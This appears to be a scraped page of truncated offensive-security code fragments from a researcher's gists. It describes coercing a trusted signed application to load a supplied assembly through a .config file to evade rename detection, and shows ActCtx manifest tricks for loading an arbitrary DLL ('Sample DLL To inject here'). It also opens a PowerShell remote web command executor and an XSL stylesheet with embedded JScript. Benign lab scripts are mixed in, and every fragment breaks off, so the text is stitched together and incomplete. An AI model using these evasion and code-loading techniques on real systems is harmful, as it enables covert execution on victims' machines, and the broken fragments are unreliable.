Casey secdev02

Building a Serverless Reverse TLS PRoxy Experiment.

curl "https://www.tlsdebug.com/debug?site=example.com"

{
  "request": {
    "method": "GET",
    "url": "https://example.com/",

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

	# HelloOData.ps1 - Minimal OData Service
	$url = "http://localhost:8080/"

	$listener = New-Object System.Net.HttpListener
	$listener.Prefixes.Add($url)
	$listener.Start()

	Write-Host "OData service running at $url"
	Write-Host "Try: ${url}odata/`$metadata"
	Write-Host "Try: ${url}odata/Messages"

	# PowerShell Web Command Executor
	# WARNING: This script allows remote command execution and poses significant security risks
	# Use only in isolated/trusted environments with proper security measures

	# Configuration
	$port = 8080
	$prefix = "http://" + $port + "/"

	# Create HTTP listener
	$listener = New-Object System.Net.HttpListener

	using System;

	namespace CrashTestApp
	{
	class Program
	{
	static void Main(string[] args)
	{
	Console.WriteLine("Crash Test Application");
	Console.WriteLine("======================");

	<#
	.SYNOPSIS
	Configure Windows Error Reporting to use an internal corporate server,
	trigger a test crash, and review reports.

	.DESCRIPTION
	This script provides functions to:
	- Set WER corporate server URL and settings
	- Trigger a basic crash for testing
	- Review pending and archived WER reports

	//Example Reference:
	// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
	// Test


	new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
	// Change that C:\\Tools to a location you specify, or dynamically find current directory.
	// ActCTX will search for the DLL in TMP

	var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';

	#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

	# Sample DLL To inject here
	# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

	$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
	$ax = new-object -Com "Microsoft.Windows.ActCtx"
	$ax.ManifestText = $manifest;
	$DWX = $ax.CreateObject("JustMakeSomethingUp");

	<#
	.SYNOPSIS
	Script to install and configure a standalone RootCA for Lab-Environments
	.DESCRIPTION
	This Script sets up a standalone RootCA. It's main purpose is to save time when building Labs in the classes I teach.
	###It's not meant for production!###
	First, it creates a CAPolicy.inf file. Then it deletes all default CDP and AIA and configures new ones.
	It turns on auditing and copys (It's a Lab!!!, so obviously no real offline RootCA...) the crt and crl to an edge webserver.
	.NOTES
	Author: Oliver Jäkel \| [email protected] \| @JaekelEDV

	<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:user="http://mycompany.com/mynamespace">
	<!--from
	https://gist.github.com/subTee/aa548b36b5d3c8f07e2024ab39217712
	-->
	<msxsl:script language="JScript" implements-prefix="user">
	<![CDATA[